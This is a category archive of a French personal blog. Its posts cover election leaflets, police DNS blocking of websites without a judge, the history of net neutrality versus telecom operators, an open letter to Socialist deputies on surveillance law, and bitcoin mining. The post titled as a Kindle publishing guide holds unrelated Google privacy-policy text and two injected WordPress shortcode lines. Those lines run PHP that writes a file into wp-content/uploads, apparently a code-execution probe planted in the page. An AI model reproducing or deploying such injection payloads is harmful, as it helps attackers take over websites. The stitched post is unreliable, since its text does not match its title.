Category Archives: divers

Professions de foi et bulletins, élections régionales 2015, Île de France

Comme pour les élections européennes, voici le PDF des professions de foi reçues par la poste hier (27 novembre 2015). Le PDF inclut les papiers dans l’ordre exact à leur réception. Il y avait deux paquets séparés dans l’enveloppe, l’un commençant par les papiers de Lutte Ouvrière, l’autre commençant par ceux du FN.

Toutes les listes candidates ne sont pas dans les papiers reçus, il manque :

  • Fédération libertaire unitaire ouverte (FLUO), liée d’après son affiche, entre autres, au “Parti pirate”
  • Liste d’union citoyenne
  • Nous Citoyens (NC)
  • Parti libéral démocrate (PLD) – Génération Citoyens (GC)
  • Union des démocrates musulmans français (UDMF)
No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1Nb4aJWgAUAqMUCzeF2vTTDUNVNTM5ak42

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Censure sans juge d’Internet et délit d’opinion

Vous avez peut-être (mais sans doute pas) entendu parler des lois LOPPSI et Terrorisme (cette dernière votée fin 2014) et de leur décret d’application (sorti en début d’année 2015).

Ces lois permettent à la police, sans intervention d’un juge et sans aucune transparence, de bloquer, avec l’aide de certains fournisseurs d’accès (pour l’instant, seuls les 4 plus gros en France, à savoir Orange, Free, SFR et Bouygues) un site Internet faisant l’apologie du terrorisme.

Pour ne pas accabler le gouvernement, il faut savoir que le PS a combattu le blocage sans juge avec succès lorsqu’il était dans l’opposition, pendant le mandat Sarkozy, avant de le voter quasi unanimement en 2014, avec l’aide du PCF (qui voulait en fait voter contre mais ne s’en est aperçu qu’après).

Le blocage, techniquement parlant, est un blocage DNS, mais cela n’a guère d’importance ici.

Le premier site dont quelqu’un (un journaliste spécialiste du djihadisme, David Thomson) constate publiquement le blocage — puisque tout cela côté administration se fait dans l’opacité la plus totale — est islamic-news.info. C’est un site dont, personnellement, je n’avais jamais entendu parler jusqu’à ce jour. Si vous cliquez sur ce lien, vous allez vous retrouver :

  • ou bien sur une page d’avertissement du ministère de l’Intérieur, si votre FAI est l’un des quatre susnommés et que vous utilisez leurs serveurs DNS ;
  • ou sinon sur rien du tout, le site en question (chez un hébergeur français) ayant été manifestement coupé (on ne sait pas par qui).

Théoriquement, le principe de subsidiarité veut que l’hébergeur ait 24 heures pour couper le site incriminé ; le blocage DNS n’étant supposé être activé qu’à l’issue de ce délai et en l’absence de coupure par l’hébergeur ou l’éditeur. En fait, le blocage DNS n’était théoriquement destiné qu’à censurer sur le territoire français, les sites étrangers, non soumis à la LCEN. On voit donc que le ministère de l’Intérieur a interprété au sens large la loi qui a été votée en l’appliquant à un site hébergé en France.

Les deux blocages ayant été mis en place, rien ne dit que ce délai a été respecté (mais rien ne dit non plus le contraire), en raison de l’opacité des procédures. [mise à jour 16/3/2015] En fait, l’hébergeur affirme ne pas avoir été notifié au préalable. “Pq personne ne nous a notifié LCEN pour fermer le site ? J’apprends ce matin qu’il a été bloqué par le M Intérieur !?”.

Voici la page d’accueil de la police (qui ne fonctionne que si on arrive par un lien “principal” du site bloqué, et pas par un lien interne).

police

Cela dit il est facile de voir la page d’accueil du site (hors images) car celle-ci est encore visible dans le cache Google :

cacheislamicinfo

 

Il s’agit d’un site d’actualités islamiques apparemment assez “engagé”, comme d’autres sites non moins engagés mais sur d’autres sujets, également situés en France.

Le site fait-il vraiment l’apologie du terrorisme ? Difficile à dire, on entre là dans le jugement de valeur.

Et c’est bien tout le problème.

La police a “jugé” (guillemets) que oui, ce site fait l’apologie du terrorisme. Nous sommes obligés de lui faire confiance, n’ayant ni accès à l’intégralité du site, ni la possibilité de trouver quel est le contenu incriminé précisément (cela ne me saute pas aux yeux sur la page d’accueil).

La décision de la police n’a pas à être motivée, tout juste est-elle susceptible de recours gracieux, hiérarchique puis contentieux — les nouvelles règles sur l’acceptation implicite de l’administration en l’absence de réponse de sa part dans le délai imparti ne s’appliquent pas ici, ce serait trop beau :

En l’absence de réponse de l’administration dans un délai de deux mois à compter de la date de réception de votre recours, celui-ci doit être considéré comme implicitement rejeté.

Ensuite un recours est possible auprès du tribunal administratif de Cergy-Pontoise, ce qui est rendu d’autant plus difficile que la décision à contester n’est ni publique ni motivée.

La loi suscitée permet également à la police française d’exiger le déréférencement par Google et les autres moteurs de recherche, sans aucun recours prévu en revanche de ce côté.

Nous nous retrouvons donc dans un régime où la police, sans contre pouvoir réel car avec des voies de recours extrêmement difficiles et aléatoires, peut décider de ce que nous avons le droit de voir ou pas.

Vous pensez peut-être que, pour lutter contre le terrorisme, cela est parfaitement anodin et normal, et que les services administratifs de la police n’ont de compte à rendre à personne en termes de transparence.

[Mise à jour du 17/3/2015 “Beauvau n’avait pas prévu de communiquer initialement” sur ce sujet, nous apprend un article du Monde, mais dans ce même article nous apprenons que ces sites ont été ciblés parce qu’ils “ne constituaient pas des médias stratégiques pour les services de renseignement français, qui en ont besoin pour surveiller des candidats au djihad“. Autrement dit, les sites bloqués ne sont que des sites de seconde zone pour amuser la galerie, sans souci d’efficacité autre que médiatique. ]

Sachez alors que Christiane Taubira, ministre de la justice, propose l’extension de ce blocage sans juge aux contenus antisémites et racistes — sur simple estimation opaque et non motivée de la police, là encore.

Sachez enfin qu’un député PS, Guy Delcourt, du Pas de Calais, a demandé très récemment l’extension de ce blocage aux injures envers les élus (uniquement envers les élus), sous couvert de protection de la démocratie. C’est ici, trouvé par l’œil affûté de Nextinpact :

http://questions.assemblee-nationale.fr/q14/14-75404QE.htm

 

Dans l’indifférence, pour ne pas dire l’approbation, quasi-générale,  l’état de droit continue donc de s’effriter peu à peu avec la mise en place par nos gouvernements et parlementaires de procédures d’exception, sous prétexte de protection de… l’état de droit.

[mise à jour du 18/3/2015] à lire absolument car elle donne un tout autre point de vue, la réponse de l’auteur du site islamic-news.info chez Numérama.

[mise à jour du 16/3/2015] Incidemment, on remarquera que la page Facebook de Islamic-News existe toujours : seul un blocage complet de Facebook en France serait possible, ce à quoi la police n’a pas osé procéder. Le blocage DNS va donc pousser les groupes fondamentalistes à recentrer leurs contenus sur les sites comme Facebook et Youtube, qui pratique une censure qui leur est propre.

Compléments :

[mise à jour du 16/3/2015] Il y a (au moins) 2 autres messages à d’autres adresses IP, dénichés par Stéphane Bortzmeyer.

90.85.16.50 prévue pour le “contenu illicite” en général, sans précision.

mi-illicite

90.85.16.51 pour la “pornographie enfantine”

mi-porno

[mise à jour 16/3/2015 18h20] apparemment le ministère d’Intérieur n’apprécie pas que l’on aille consulter sa page d’interdiction sans vouloir aller sur un site interdit.

miforbid

J’ai donc créé les adresses interieur0.eu.org  interieur1.eu.org interieur2.eu.org

[mise à jour du 17/3/2015 9h38] Un article d’Amaëlle Guitton indique les autres sites bloqués, qui eux sont encore accessibles si on n’utilise pas un DNS menteur : .

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1Ctax3LrjxCQ6n6ZobymGwaZNzqssGMciQ

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Petite histoire de la neutralité d’Internet à travers les âges

Comme vous le savez sûrement, la FCC (Federal Communications Commission) des USA a voté en faveur de la neutralité d’Internet aux USA.

Aussitôt, les telcos (opérateurs) US se sont élevés pour dire, en substance, que c’était une stupidité qui allait les empêcher de facturer plus cher, de mettre en place des priorités, et “donc” — je leur laisse la responsabilité du lien de causalité supposé — d’innover [alors qu’on peut démontrer, comme je l’ai fait ici, l’inverse d’un point de vue rationnel, et a fortiori quand on regarde l’histoire du Minitel tué par Internet et la loi de Moore]

Pour expliquer à nouveau pourquoi ils disent à nouveau des bêtises, il est intéressant de revenir sur différents épisodes similaires qui ont marqué l’histoire des réseaux de données.

1969 : Arpanet 1, Telcos 0

À la fin des années 1960, lorsque les concepteurs du réseau Arpanet (prédécesseur d’Internet) ont commencé à travailler, ils sont allés voir les opérateurs de télécommunications US, ou plus précisément, L‘opérateur de télécommunications US : AT&T, pour lui demander son avis sur l’architecture prévue.

AT&T a regardé les schémas de haut, et leur a répondu en substance : “écoutez les petits amis informaticiens, vous êtes bien gentils, mais votre truc, ça ne marchera jamais. Oh, vous allez bien vous amuser et échanger quelques données entre potes, mais passé une certaine échelle, tout s’écroulera. Chez nous, pour transmettre la voix, on construit les réseaux de manière fort différente, parce que la voix, c’est compliqué. Alors votre réseau ne saura jamais transmettre la voix correctement”.

Et on crut le telco. Les concepteurs d’Arpanet ont conçu Arpanet quand même, sans trop s’inspirer des conseils du telco, et pour connecter différents sites de recherche et échanger des courriers électroniques et des fichiers, cela fonctionnait très bien.

Peu après, au début des années 70, en France, Louis Pouzin et son équipe, informaticiens eux aussi, inventaient pour leur réseau expérimental Cyclades la lettre postale du numérique : le datagramme, le paquet de données ; qui disposait d’une adresse destination, comme une lettre, et qui permettait d’envoyer les données par morceaux.

Et également pendant ce temps, en France, les chercheurs de l’opérateur national concevaient également le futur réseau de transmission de données, Transpac, conçu suivant les règles de l’art, enfin, les règles de l’art des telcos, et une norme internationale, X.25. Tout cela calqué directement sur le modèle du réseau téléphonique, mais sans notion réelle de priorité, qui n’importait pas à l’époque : Transpac n’était fait que pour transporter des données, pas la voix. La voix, c’était la seule vraie application de masse des réseaux, elle était facturée cher car volumineuse, et à l’époque la connexion d’un gros serveur Transpac avait un débit largement inférieur à celui nécessaire pour une simple communication vocale.

Cyclades se développa, Transpac se développa et rapidement il fallut choisir quel serait le réseau déployé nationalement pour être commercialisé. Que croyez vous qu’il arriva ? Transpac, soutenu par l’opérateur national et conçu suivant les règles de l’art par les spécialistes de la question, remporta la manche.

1974 : Cyclades 1, X.25 0

Pendant ce temps, aux USA, Vint Cert et ses collègues reprenaient les idées de Cyclades : le datagramme, l’adressage logique, l’interconnexion des réseaux, et j’en passe, pour inventer TCP/IP qui devait permettre à Arpanet de devenir l’Internet que nous connaissons. Les telcos se pinçaient le nez devant à peu près l’intégralité de ces idées, qui violaient sauvagement les règles de l’art établies depuis des décennies par les spécialistes de la voix.

Puis au milieu des années 80 arriva en France le Minitel, qui répondait rigoureusement aux idées des telcos pour monétiser leur activité : faire payer à la connexion, à la durée, et éventuellement au débit. Car, comprenez-vous, il fallait éviter que les gens abusent du réseau et y prennent plus que leur part. Le meilleur moyen était de facturer rigoureusement à l’usage, non ?

Et on les crut. le Minitel fut un succès.

1980s : Internet 1, X.25 0

Pendant ce temps, Internet suivait le modèle des rigolos universitaires et chercheurs, qui n’étaient là que pour avoir un réseau qui marche entre eux et au moindre coût, et qui n’avaient pas les moyens de se payer X.25, équipements plus lourds, facturation plus chère, modèle moins souple.

Internet se développa d’abord aux US, puis commença à la fin des années 80 à conquérir le monde de la recherche, notamment en Europe, et finit rapidement par se trouver ici ou là nez à nez avec X.25, et lui fut largement préféré par ceux qui avaient le choix, parce qu’ils n’y connaissaient rien, les pauvres.

Quelques opérateurs Internet français ou européens, les données étant encore chères à l’époque, décidèrent d’appliquer un modèle de facturation inspiré du Minitel (qui avait pourtant amorcé son repli) pour répartir équitablement les coûts et éviter les abus, et moururent très rapidement face à ceux qui fournissaient des offres au forfait.

Voyant qu’Internet devenait de plus en plus fort, les opérateurs de télécoms n’étaient pas en reste. Ils avaient depuis la fin des années 80 travaillé sur les protocoles du futur, et en particulier l’ATM, asynchronous transfer mode. L’ATM était le réseau de données du futur : il était conçu suivant les règles de l’art et permettait de garantir la qualité de service, le débit, que-sais-je, en réservant et en facturant la réservation des ressources réseau, par souci d’équité et de business model sonnant et trébuchant.

Vous comprenez, il fallait bien que les telcos aient une motivation pour développer le réseau ! ATM était le vrai réseau des professionnels, permettrait de transporter correctement de la voix, de la vidéo, et toutes ces choses qu’Internet était totalement incapable de fournir sérieusement à grande échelle et internationalement, soyons sérieux.

Au milieu-fin des années 90, ATM était prêt et, c’était sûr selon les telcos, allait remplacer Internet dans le développement naturel des réseaux de données.

1990s : Internet 1, ATM 0

Curieusement, cela ne marcha pas : ATM était techniquement trop cher en matériel comme en utilisation, n’arriva jamais à se développer pour les communications internationales où il s’annonçait encore plus onéreux voire impossible à faire fonctionner avec les garanties luxueuses annoncées, et là encore Internet lui était quasi systématiquement préféré par les gens qui avaient le choix. L’histoire de X.25 avait tendance à bégayer.

ATM se retrouva cantonné aux département de recherche des spécialistes en télécom, et Internet devint le réseau international sérieux, c’est à dire exactement l’inverse de ce que les telcos avaient soigneusement planifié. Ceux-ci, pour éviter de se faire mettre au placard dans les 5 ans suivants, rachetèrent massivement les petits opérateurs Internet de l’époque, ou changèrent leur fusil d’épaule.

Donc nous sommes en 2015, où après 4 échecs sanglants du modèle telco des vrais spécialistes, les vrais spécialistes reviennent nous expliquer que la neutralité d’Internet, ce n’est pas bien sérieux et ça va empêcher le réseau de se développer pour faire des vraies choses dont nous allons avoir besoin très bientôt.

Alors… vous les croyez encore, vous ?

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1KMNBXofZGAMNuzpBtKXJ3RbfhP87yJjze

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Publier un livre Kindle avec un outil libre : LibreOffice

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

12DJeFvToFZyj9dXREKuUkFVdAZS8GtXR4

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Professions de foi et bulletins, élections européennes 2014, Île de France

Au cas où cela pourrait intéresser quelqu’un, ne serait-ce que pour des raisons d’accessibilité, voici  les documents que je viens de recevoir par courrier pour les élections européennes du 25 mai, région Île-de-France :

  • scan des professions de foi (attention : 50 Mo) pour 14 partis, dans l’ordre où je les ai reçues ;
  • scan des bulletins, pour 11 partis (tous simple face, sauf celui du PS, tels que je les ai reçus sauf celui du PS replacé en fin pour clarté)

et pour faire bonne mesure, la liste des 31 listes se présentant, sur le site du ministère de l’Intérieur, recopiée ici en document PDF car je doute que cette adresse soit pérenne.

Car, de plus en plus souvent dans les élections en France, à moins d’aller fouiner sur le site web de l’Intérieur, on ne sait qu’au dernier moment, au bureau de vote, quels sont les candidats ou listes pour lesquels on peut voter.

Ainsi, il faut vraiment être motivé pour apprendre que le Parti Pirate présente une liste en Île de France… j’aime bien leur phrase : “La NSA sait déjà que vous allez voter pour nous”.

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1FHCyU7EQ8sbuzhgTcBkhKqKmx7L64GAQM

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Retour sur ma lettre ouverte sur la loi de programmation militaire

Suite à ma Lettre ouverte aux députés PS, que s’est-il passé ?

J’ai eu trois réponses circonstanciées de députés : un député UMP, un député EELV, un député non inscrit. Je les en remercie.

Tous trois avaient voté contre la LPM, et me l’ont rappelé.

Côté PS, rien du tout, le néant absolu. La discipline de parti a joué à plein, de même que dans les média.

Concernant la LPM, le recours au Conseil Constitutionnel, comme on pouvait s’y attendre, a échoué. Non par manque de députés volontaires pour voter (il y en avait plus de 60) mais par considérations partisanes, certains refusant d’être associés à d’autres sur la liste de signataires du recours. Le sujet de l’article 20 de la LPM est donc jugé moins important par nos élus que les considérations partisanes et d’appareil. Dont acte, même si on pouvait également s’y attendre.

Laure de la Raudière continue courageusement et souhaite proposer une loi pour réécrire l’article 20. On peut lui souhaiter bonne chance.

Il est confirmé que la loi a effectivement été écrite très largement par les experts des services de renseignement français, qui en ont à de multiples reprises discuté avec Jean-Jacques Urvoas, comme le révèle le Canard Enchaîné et comme l’intéressé lui-même le reconnaît. De même, Jean-Pierre Sueur a défendu sur nos ondes radio le travail remarquable de nos services de renseignement. Tout ce petit monde sait donc parfaitement bien ce qu’il fait (pourquoi changer puisque c’est le fonctionnement habituel du législateur depuis des décennies), et les flous dangereux dans la rédaction de l’article 20 et de ses copains ne peuvent en aucun cas passer pour un accident. Les décrets d’application seraient déjà pratiquement prêts.

Les dérives sont inévitables, parce que l’administration aura naturellement tendance à utiliser la loi au maximum des possibilités qu’elle lui offre, comme le fait la NSA. On attend avec intérêt les cris d’orfraie de nos journaux (jusque-là muets) sur telle ou telle future affaire de fadette touchant l’un de leurs journalistes d’investigation. Aux USA, le journalisme d’investigation est déjà freiné par la peur des écoutes NSA.

J’ai fait un don à la Quadrature du Net pour sa vigilance dans la surveillance de l’appareil législatif français et européen.

Concernant les réformes possibles de nos institutions, personne n’en parle. Quand on voit la difficulté de réformes à la marge comme le non-cumul des mandats, et la timidité (pour ne pas dire l’inanité) du rapport Jospin sur la rénovation de la vie politique, qui ne cite Internet que comme plaquette d’information du politique à destination du citoyen, le citoyen comme moi a des raisons de penser que le système ne changera significativement que s’il s’écroule d’abord sur lui-même.

Et puisque mon vote n’a strictement aucune influence sur le cours des choses, qu’au contraire même on s’en sert contre moi pour me démontrer la légitimité des lois votées par les parlementaires, mais qu’en revanche le taux d’abstention est scrupuleusement suivi à chaque scrutin, il n’est pas exclu que je rejoigne les rangs des abstentionnistes. Parce que j’ai horreur d’être pris pour un idiot.

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1PZN9z4WRUJxTEt3j1E4bwM1xdwaBpWNT4

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Lettre ouverte aux députés PS

Madame, Monsieur le député,

Vous avez voté pour la loi de programmation militaire (LPM), dont l’article 20 (ex 13) et ses articles connexes provoquent une polémique en raisons de dispositions intrinsèquement attentatoires à la vie privée qu’ils contiennent :

  • élargissement des motifs, largement au-delà du terrorisme ;
  • élargissement des administrations en mesure de procéder à ces récupérations de données ;
  • gestion par une autorité indépendante mais hors de contrôle de la justice.

Je vous l’ai copié pour mémoire à la fin de cette lettre, et j’ai mis certains passages, les plus inquiétants, en gras.

Car après avoir longuement réfléchi, j’ai décidé de ne pas vous écrire un nième argumentaire juridique.

D’abord parce que je ne suis pas juriste ; ensuite parce que d’autres l’ont fait beaucoup mieux que je n’en serais capable. Je pense par exemple à la quadrature du net, la fédération internationale des ligues des droits de l’homme, reporters sans frontières, le syndicat de la magistrature, l’ASIC, le Conseil National du Numérique, et bien d’autres encore.

Ensuite, et surtout, parce qu’à mon sens le problème n’est pas simplement d’ordre juridique, mais démocratique.

Ainsi, quand on m’explique que ce qui a été écrit ne correspond pas à ce qu’il faut comprendre et qui sera mis en œuvre, venant de juristes, je pense qu’on me prend pour un idiot.

Également, quand on me dit que cette loi ne fait que reprendre des lois datant de plus de 20 ans. Il y a plus de 20 ans, je n’avais pas Internet chez moi, pas de téléphone mobile, pas de tablette, tout juste une adresse de courrier électronique ; les conditions n’étaient pas du tout comparables.

Par ailleurs, le fait qu’une loi peu soucieuse de respect de la vie privée ait été votée non en 2013 mais 20 ans avant justifie-t-il qu’on conserve ses dispositions lors d’une révision ?

Enfin, quand on nous explique que ces immixtions dans nos vies privées seront autorisées dans des conditions mystérieuses sur des critères non explicités par une autorité indépendante chapeautée par un adjoint du premier ministre, je me demande si nous donnons le même sens à indépendante.

En somme, une loi objectivement attentatoire à la vie privée, dont les arguments brandis pour la défendre ne tentent que de relativiser la portée, sans la nier.

Je vous en veux d’avoir voté cette loi, d’être ou bien en accord avec la loi, ou bien esclave d’une discipline de groupe. Vous faites partie de la majorité, et le groupe de la majorité vote en bloc, plus ou moins aveuglément, toutes les lois proposées.

J’en veux à votre parti, le PS. Il reproduit depuis des décennies cette discipline de groupe. Ainsi, Christian Paul qui s’intéresse de longue date à ces questions, s’est exprimé plus ou moins implicitement contre l’article 20 mais a voté pour cette loi.

J’en veux autant au groupe UMP, esclave de la même discipline et qui, parti principal d’opposition, et après avoir collaboré à la rédaction de la loi, a voté en bloc contre la loi, parce qu’il est dans l’opposition.

Je réalise parfaitement que la même loi aurait été votée, probablement mot pour mot, par l’UMP si elle était au pouvoir, et que le PS aurait alors voté contre. Les précédents abondent.

Pourquoi ?

L’article 20 qui nous intéresse semble relever, entre autres, et cela a été dit presque explicitement, d’une volonté de simplifier le travail de l’administration, et de légaliser des pratiques courantes mais jusque là interdites (et pour cause). Je comprends que l’administration, la police, aient envie qu’on leur simplifie le travail. Mais sans doute pourrait-on en prendre acte autrement qu’en court-circuitant les procédures démocratiques.

Surtout, quand il s’agit comme dans le cas présent de nos libertés fondamentales, vous, hommes et femmes politiques, qui détenez les clés législatives, devriez jouer votre rôle de gardiens de la démocratie.

Vous devriez a fortiori être vigilants suite au scandale des écoutes de la NSA (National Security Agency) des États-Unis, déclenché par les révélations d’Edward Snowden, largement médiatisées, et qui ont provoqué une légitime indignation, y compris de la part du personnel politique français au pouvoir. Car la NSA a profité de nombreux flous juridiques en interprétant la loi dans un sens extensif pour étendre au maximum son périmètre. Or, les dispositions de l’article 20 et articles connexes sont elles-mêmes extrêmement floues ; et ce sont ces articles mêmes dont on nous assure qu’il ne faut pas les interpréter littéralement.

Le personnel politique, pour l’essentiel, ne semble pas se considérer suffisamment compétent pour avoir un avis éclairé, ni, plus grave, souhaiter acquérir les compétences qui lui manquent. Il délègue aveuglément la décision et la rédaction à quelques experts choisis, parfois dans ses propres rangs, le plus souvent dans l’administration ou la « société civile ».

Que faire ?

Dans le cas de la LPM, j’espère, sans trop y croire, que le conseil constitutionnel, qui ne peut s’auto-saisir – cela seul en dit long sur la « séparation des pouvoirs » telle qu’on la conçoit en France –, sera saisi et donnera un avis défavorable.

Une des réponses entendues a été de nous promettre une « loi sur les libertés numériques » pour 2014. Je ne pense pas vous faire injure en vous avouant que je ne crois pas une seconde que la présente disposition de la LPM y sera remise sérieusement en question.

Dans le futur, puisque mon choix n’a presque aucune importance et que c’est au final l’administration, ou certains lobbies, qui dictent l’essentiel des lois, je ne vois guère d’intérêt à donner mon suffrage pour désigner l’un de ceux qu’on appelle les « partis de gouvernement ».

Pour le reste, j’espère, sans y croire non plus, une réforme sérieuse de nos institutions, et en particulier du processus législatif afin de le rendre à nouveau digne de ce qu’un citoyen d’une démocratie moderne est en droit d’attendre.

De nombreuses personnes que j’estime et respecte tentent néanmoins d’agir pour faire avancer les choses.

Ainsi, Laure de la Raudière, Bruno Spiquel avec bien d’autres ont mis en œuvre une initiative appelée OVEI, On vous explique Internet, visant à mettre en contact le monde parlementaire et les informaticiens.

Ainsi, Laurent Chemla et Éric Walter ont proposé, indépendamment, une commission « Internet » permanente à l’assemblée nationale. Ce serait sans doute un bon début, même si ce ne serait qu’un début.

Car vous devez réaliser que le système actuel date d’une époque où la plupart des français n’avaient ni le téléphone ni la télévision, communiquaient par la poste, et s’informaient par la presse écrite et la radio, si j’ai la courtoisie de ne remonter qu’à 1958.

Depuis, si le système politique a très bien appris à exploiter les nouveaux media « descendants » (comme la télévision) pour populariser tel candidat, telle idée ou telle action, on ne peut pas en dire autant des possibilités de communication « remontante » que nous offre Internet depuis 20 ans.

Ainsi, si Internet permet aux citoyens de s’intéresser beaucoup plus facilement aux détails et aux aléas manifestes de l’activité politique, et de s’exprimer publiquement, la rénovation réciproque n’a pas eu lieu. Pour citer un exemple pourtant relativement classique dans son idée, le référendum d’initiative partagée a été soigneusement verrouillé et est inapplicable : il demande plus du triple de députés et sénateurs qu’un recours au conseil constitutionnel ! L’épisode des déclarations « publiques » de patrimoine s’est soldé par une farce pure et simple.

Le déséquilibre entre l’évolution de la société et celle de nos institutions et de nos représentants est de plus en plus criant, douloureux et dangereux.

Que le parlement se comporte ainsi en simple chambre d’enregistrement de l’administration sur des consensus qui n’existent qu’en haut lieu ne fait honneur ni à l’administration, ni à votre fonction, ni à notre démocratie. J’ai un peu la sensation qu’on confisque mon vote, qu’on néglige la démocratie et qu’on ignore mon avis.

Ce présent avis, j’estime que ne devrais même pas avoir à vous le donner, car je n’ai pas l’impression de proférer autre chose que des évidences.

Je vous prie d’agréer, Madame, Monsieur le député, l’expression de ma parfaite considération.

Pierre Beyssac

 

 

Art. L. 246‑1. – Pour les finalités énumérées à l’article L. 241‑2, peut être autorisé le recueil, auprès des opérateurs de communications électroniques et des personnes mentionnées à l’article L. 34‑1 du code des postes et des communications électroniques ainsi que des personnes mentionnées aux 1 et 2 du I de l’article 6 de la loi n° 2004‑575 du 21 juin 2004 pour la confiance dans l’économie numérique, des informations ou documents traités ou conservés par leurs réseaux ou services de communications électroniques, y compris les données techniques relatives à l’identification des numéros d’abonnement ou de connexion à des services de communications électroniques, au recensement de l’ensemble des numéros d’abonnement ou de connexion d’une personne désignée, à la localisation des équipements terminaux utilisés ainsi qu’aux communications d’un abonné portant sur la liste des numéros appelés et appelants, la durée et la date des communications.

Art. L. 246‑2. – I. – Les informations ou documents mentionnés à l’article L. 246‑1 sont sollicités par les agents individuellement désignés et dûment habilités des services relevant des ministres chargés de la sécurité intérieure, de la défense, de l’économie et du budget, chargés des missions prévues à l’article L. 241‑2.

II. – Les demandes des agents sont motivées et soumises à la décision d’une personnalité qualifiée placée auprès du Premier ministre. Cette personnalité est désignée pour une durée de trois ans renouvelable par la Commission nationale de contrôle des interceptions de sécurité, sur proposition du Premier ministre qui lui présente une liste d’au moins trois noms. Des adjoints pouvant la suppléer sont désignés dans les mêmes conditions. La personnalité qualifiée établit un rapport d’activité annuel adressé à la Commission nationale de contrôle des interceptions de sécurité. Ces décisions, accompagnées de leur motif, font l’objet d’un enregistrement et sont communiquées à la Commission nationale de contrôle des interceptions de sécurité.

Pour rappel, art. 241-2 du code de la sécurité intérieure :

Art. L241-2 Peuvent être autorisées, à titre exceptionnel, dans les conditions prévues par l’article L. 242-1, les interceptions de correspondances émises par la voie des communications électroniques ayant pour objet de rechercher des renseignements intéressant la sécurité nationale, la sauvegarde des éléments essentiels du potentiel scientifique et économique de la France, ou la prévention du terrorisme, de la criminalité et de la délinquance organisées et de la reconstitution ou du maintien de groupements dissous en application de l’article L. 212-1.

1 tip so far
0.00152 BTC

Like this post? Tip me with bitcoin!

1F7vreeRcfobpkcDtKSij4DintQ9Laf531

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Comprendre le minage Bitcoin

Ayant poursuivi mes réflexions après mon article précédent, je me suis intéressé au fonctionnement du minage de bitcoins.

Pour commencer, une petite démonstration de mathématiques

Supposons que vous ne soyez pas très bon en maths et que vous ne connaissiez que la multiplication, pas la division.

Par quels chiffres doit-on compléter les xxx dans 4025249123xxx pour que le résultat de sa multiplication par 7 se termine par 30 ?

Le plus simple est d’essayer les combinaisons une par une :

  • 4025249123000 x 7 = 28176743861000
  • 4025249123001 x 7 = 28176743861007
  • 4025249123002 x 7 = 28176743861014
  • 4025249123003 x 7 = 28176743861021
  • 4025249123004 x 7 = 28176743861028
  • 4025249123005 x 7 = 28176743861035

En continuant ainsi on finit par tomber sur une bonne combinaison :

  • 4025249123090 x 7 = 28176743861630

Mais ce n’est pas la seule, on aurait pu également trouver :

  • 4025249123190 x 7 = 28176743862330

Une fois la solution trouvée, n’importe qui sachant calculer une multiplication peut la vérifier très rapidement.

Revenons à nos bitcoins…

Ce qui précède, c’est le principe général du “travail” Bitcoin, qui permet simultanément de rendre compliquées la création de monnaie et la validation des transactions, afin que n’importe qui ne fasse pas n’importe quoi, tout en rendant très facile leur vérification.

À la place de la multiplication par 7, on utilise une fonction de cryptographie appelée un hachage, ici SHA256, qui à partir d’un paquet de données binaires produit 256 bits de résultat (d’où son nom), d’une manière qu’on ne sait pas inverser. Ce genre de fonction est abondamment utilisé pour des signatures électroniques : le seul moyen pour trouver un paquet en entrée fournissant la sortie voulue, c’est de faire un grand nombre d’essais au hasard en appliquant la fonction (on dit force brute).

Ainsi le hachage SHA256 du paragraphe qui précède est 2756436ec1d5614b9e22840bf4f5bbbc580c897973d1e4607dc0a723f8d75073. En enlevant juste la première lettre, on obtient 6b8dc910fa3b2c8e3d40244869d5e1a5fe7753a1862eed5a306d2fceb6fe60fb.

À la place du nombre à compléter, on utilise une liste de transactions Bitcoin déjà signées par les clés des émetteurs, avec un emplacement à remplir appelé la nonce. (en fait le principe est similaire mais un petit peu plus compliqué, voir ce billet chez Turblog pour des détails techniques plus précis).

Au lieu de chercher un nombre se terminant par 30, on cherche un nombre inférieur à une certaine valeur, donc commençant par un certain nombre de zéros.

Et tous les ordinateurs du réseau Bitcoin cherchent simultanément des solutions à ce paquet, ce qui revient en gros à effectuer des tirages au sort vérifiables a posteriori.

